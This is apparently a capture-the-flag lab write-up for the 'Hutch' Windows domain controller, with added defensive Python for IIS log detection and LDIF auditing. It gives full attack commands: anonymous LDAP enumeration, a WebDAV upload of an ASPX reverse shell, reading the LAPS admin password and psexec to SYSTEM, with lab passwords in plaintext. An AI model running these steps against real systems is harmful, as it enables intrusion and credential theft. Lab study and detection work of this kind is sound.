# Hutch

## Nmap

```
sudo nmap 192.168.89.122 -p- -sV -sS

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-03-01 21:29:49Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: hutch.offsec0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: hutch.offsec0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf        .NET Message Framing
49666/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49670/tcp open  msrpc         Microsoft Windows RPC
49672/tcp open  msrpc         Microsoft Windows RPC
49688/tcp open  msrpc         Microsoft Windows RPC
49767/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: HUTCHDC; OS: Windows; CPE: cpe:/o:microsoft:windows
```

We start with LDAP, running the LDAP-related `nmap` scripts (everything matching `ldap*` except the brute-force script) to enumerate the directory.

```
nmap -n -sV --script "ldap* and not brute" 192.168.89.122  
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-e9df9743199e5fe3cd5932b1078199b6ffd44261%2Fimage.png?alt=media)

Looking through the results we do not find much of interest, but we do get the naming context of hutch.offsec for the DC.

With the naming context we can run an anonymous `ldapsearch` against it to enumerate users, and `grep` the output for the SAM account name.

```
ldapsearch -x -h 192.168.89.122 -D '' -w '' -b "DC=hutch,DC=offsec" |
 grep sAMAccountName:
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-68e04b8db9247636ac3b93e190a53bae8438edd8%2Fimage.png?alt=media)

We now have the following users list:

```
rplacidi
opatry
ltaunton
acostello
jsparwell
oknee
jmckendry
avictoria
jfrarey
eaburrow
cluddy
agitthouse
fmcsorley
```

Running the same `ldapsearch` command, this time grepping for the description attribute, we see the following:

```
ldapsearch -x -h 192.168.89.122 -D '' -w '' -b "DC=hutch,DC=offsec" |
grep description
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-a50e0b6fc49d2bd74e94b9dc271a9fefb285403b%2Fimage.png?alt=media)

The last line contains a password. Correlating it by position with the user list, it belongs to the last user in the entry list, fmcsorley, which gives us the combined credentials `fmcsorley:CrabSharkJellyfish192`.

Checking the credentials with `crackmapexec` against SMB confirms they are valid.

```
crackmapexec smb 192.168.89.122 -u fmcsorley -p CrabSharkJellyfish192
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-ce79d170331509facda0506b734f4384819ef814%2Fimage.png?alt=media)

With valid SMB credentials I was unable to enumerate any further interesting information. From the Nikto results earlier, we know WebDAV is enabled.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-fa38f976ae9587063bb21b6e8935306223fd768f%2Fimage.png?alt=media)

With no specific WebDAV directory exposed, we can attempt an upload to the web root with `curl`. I first created an ASPX reverse shell with `msfvenom`, then uploaded it with `curl -T` (an HTTP PUT), supplying the valid credentials we have.

```
curl -T '/home/kali/shell.aspx' 'http://192.168.64.122/' -u fmcsorley:CrabSharkJellyfish192
```

I set the shell to call back on port 445 and started a `netcat` listener on the same port. After browsing to 192.168.64.122/shell.aspx I received a shell on my listener.
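The upload and the follow-up request above both land in the IIS W3C log, so a defender can spot this sequence after the fact. The following is an added example (not code from the original writeup) that parses IIS W3C log lines and pairs a successful PUT/MOVE/COPY of a script extension with a later GET of the same path. The log lines are constructed: the `#Fields:` header follows the IIS default layout, but every address, username and timestamp is a placeholder.

```python
"""Detect WebDAV uploads of server-side scripts in IIS W3C logs.

Added example, not code from the original writeup. An upload with
`curl -T` is an HTTP PUT; IIS records it, and records the later GET that
runs the uploaded page. All log content below is constructed.
"""
from typing import Dict, List

UPLOAD_METHODS = {"PUT", "MOVE", "COPY"}          # WebDAV authoring verbs
SCRIPT_EXT = (".aspx", ".asp", ".ashx", ".asmx")  # executed by IIS when requested

# Constructed IIS W3C log: header directives, then one record per request.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2021-03-01 21:00:00
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2021-03-01 21:30:01 10.0.0.5 GET / - 80 - 10.0.0.99 Mozilla/5.0 - 200 0 0 15
2021-03-01 21:30:05 10.0.0.5 PUT /shell.aspx - 80 EXAMPLE\\user1 10.0.0.99 curl/7.74.0 - 201 0 0 40
2021-03-01 21:30:09 10.0.0.5 GET /shell.aspx - 80 - 10.0.0.99 Mozilla/5.0 - 200 0 0 320
2021-03-01 21:31:00 10.0.0.5 PUT /docs/notes.txt - 80 EXAMPLE\\user2 10.0.0.77 curl/7.74.0 - 201 0 0 12
2021-03-01 21:32:00 10.0.0.5 PUT /test.asp - 80 EXAMPLE\\user2 10.0.0.77 curl/7.74.0 - 403 0 0 5
"""


def parse_w3c(text: str) -> List[Dict[str, str]]:
    """Parse IIS W3C extended log lines into dicts keyed by the names given
    in the '#Fields:' directive. Other '#' directives are skipped, and a
    record whose field count does not match the header is ignored."""
    fields: List[str] = []
    records: List[Dict[str, str]] = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        values = line.split()
        if len(values) != len(fields):
            continue
        records.append(dict(zip(fields, values)))
    return records


def webdav_script_uploads(records: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """One finding per successful (2xx) upload verb whose target path ends in
    a script extension, with a flag saying whether the same path was
    requested with GET afterwards (i.e. the uploaded page was executed)."""
    findings: List[Dict[str, object]] = []
    for i, r in enumerate(records):
        if r["cs-method"] not in UPLOAD_METHODS or not r["sc-status"].startswith("2"):
            continue
        path = r["cs-uri-stem"].lower()
        if not path.endswith(SCRIPT_EXT):
            continue
        executed = any(
            later["cs-method"] == "GET" and later["cs-uri-stem"].lower() == path
            for later in records[i + 1:]
        )
        findings.append({
            "time": f"{r['date']} {r['time']}",
            "path": r["cs-uri-stem"],
            "user": r["cs-username"],
            "client": r["c-ip"],
            "executed": executed,
        })
    return findings


if __name__ == "__main__":
    for finding in webdav_script_uploads(parse_w3c(SAMPLE_LOG)):
        print(finding)
```

The 201 status on the PUT is the WebDAV "created" response, which is what distinguishes a successful authoring request from a blocked one (the 403 on `/test.asp` in the sample). On the mitigation side, the same condition the detector keys on is what IIS Request Filtering and WebDAV Authoring Rules are meant to prevent: authoring verbs should not be permitted on paths from which scripts are served.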

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-d5a7aac8722a065552d5d2e72d7a305ce77233c4%2Fimage.png?alt=media)

Going through the system, we see that LAPS (Local Administrator Password Solution) is installed on the server.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-32e55a33ef0393d8f20d7d86f0fa02e928cc6273%2Fimage.png?alt=media)

It's possible that the LAPS or LDAP permissions are misconfigured so that the LAPS-managed local administrator passwords stored on computer objects in AD are readable. Knowing this, we can go back and search LDAP with the credentials we have, looking specifically for the `ms-Mcs-AdmPwd` attribute.

```
ldapsearch -x -h 192.168.64.122 -D 'hutch\fmcsorley' -w 'CrabSharkJellyfish192' -b 'dc=hutch,dc=offsec' "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd 
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-6ed473804962f2dd92e76f3fc3b2ac9dbc4f14f5%2Fimage.png?alt=media)

We can see that the LAPS password set for the domain controller is `J6QOuU+lhs[SH/`. I then confirmed the credentials with `crackmapexec` against LDAP using the local administrator account and got a successful confirmation.
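Two of the steps above were done by eye on raw `ldapsearch` output: matching the password in a description to the right account by line position, and noticing that a low-privileged bind returned `ms-Mcs-AdmPwd`. The following is an added example (not code from the original writeup) of an LDIF parser that does both checks from the entry structure rather than from grep ordering, which also handles folded lines and base64 values that a plain `grep` misses. The LDIF input is constructed; every DN, account name and value is a placeholder.

```python
"""Audit ldapsearch output (LDIF) for credential exposure.

Added example, not code from the original writeup. Two checks:
  1. user objects whose description mentions a password-like word, paired
     with the sAMAccountName from the same entry;
  2. computer objects on which ms-Mcs-AdmPwd was returned to the bind
     account, meaning the LAPS password is readable by that account.
All LDIF below is constructed; names and values are placeholders.
"""
import base64
import re
from typing import Dict, List, Tuple

Entry = Dict[str, List[str]]

# Constructed ldapsearch-style output: comments, a folded line, a base64 value.
SAMPLE_LDIF = """\
# extended LDIF
#
# LDAPv3
# base <DC=example,DC=test> with scope subtree
#
dn: CN=Alice Example,CN=Users,DC=example,DC=test
objectClass: user
sAMAccountName: aexample
description: Finance team lead

dn: CN=Bob Example,CN=Users,DC=example,DC=test
objectClass: user
sAMAccountName: bexample
description: Domain Users account. Password set to: Placeholder-Pass-123 (
 constructed sample, spans a folded line)

dn: CN=SRV01,OU=Servers,DC=example,DC=test
objectClass: computer
sAMAccountName: SRV01$
ms-Mcs-AdmPwd:: TEFQU3BsYWNlaG9sZGVy

dn: CN=WS02,OU=Workstations,DC=example,DC=test
objectClass: computer
sAMAccountName: WS02$

# search result
search: 2
result: 0 Success
"""

ATTR_LINE = re.compile(r"^([A-Za-z][\w.;-]*)(::?) ?(.*)$")
PASSWORD_WORDS = re.compile(r"\b(pass(word|wd)?|pwd|cred(ential)?s?)\b", re.I)


def parse_ldif(text: str) -> List[Entry]:
    """Minimal LDIF parser.

    Handles folded continuation lines (leading space), base64 values
    ('attr:: ...'), '#' comments and blank-line entry separators. Attribute
    names are lower-cased so ms-Mcs-AdmPwd and ms-MCS-AdmPwd compare equal.
    ldapsearch's trailing 'search:'/'result:' lines have no dn and are dropped.
    """
    unfolded = re.sub(r"\r?\n ", "", text)
    entries: List[Entry] = []
    current: Entry = {}
    for line in unfolded.splitlines():
        if not line.strip():
            if current:
                entries.append(current)
                current = {}
            continue
        if line.startswith("#"):
            continue
        m = ATTR_LINE.match(line)
        if not m:
            continue
        name, sep, value = m.group(1).lower(), m.group(2), m.group(3)
        if sep == "::":
            value = base64.b64decode(value).decode("utf-8", errors="replace")
        current.setdefault(name, []).append(value)
    if current:
        entries.append(current)
    return [e for e in entries if "dn" in e]


def descriptions_with_credentials(entries: List[Entry]) -> List[Tuple[str, str]]:
    """(sAMAccountName, description) pairs whose description mentions a
    password-like word. The pairing comes from the same entry, so it does not
    depend on the order in which grep printed the lines."""
    hits: List[Tuple[str, str]] = []
    for e in entries:
        for desc in e.get("description", []):
            if PASSWORD_WORDS.search(desc):
                hits.append((e.get("samaccountname", ["?"])[0], desc))
    return hits


def laps_readable(entries: List[Entry]) -> List[str]:
    """DNs of objects whose ms-Mcs-AdmPwd came back in the result set.

    With correctly delegated LAPS permissions a search by an ordinary user
    returns the attribute on no object; each DN listed here is a computer
    whose local administrator password the bind account can read. The value
    itself is deliberately not returned."""
    return [e["dn"][0] for e in entries if "ms-mcs-admpwd" in e]


if __name__ == "__main__":
    parsed = parse_ldif(SAMPLE_LDIF)
    for sam, desc in descriptions_with_credentials(parsed):
        print(f"description credential: {sam}: {desc}")
    for dn in laps_readable(parsed):
        print(f"LAPS password readable on: {dn}")
```

Run against saved `ldapsearch` output from an account that should not have LAPS rights, an empty list from `laps_readable` is the expected result; any DN it prints is a delegation error to fix on the OU's ACL. The description check is a weak heuristic by design, since the point is to review those entries by hand rather than to trust a regex.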

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-3ffcfbb6f3a83ebcaa73a6ecb44cfed773ed6889%2Fimage.png?alt=media)

I was then able to use these credentials with Impacket's psexec.py to gain access to the Domain Controller as SYSTEM.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-c9eaa95e693bfe14613461611b4da9f1e9266d09%2Fimage.png?alt=media)

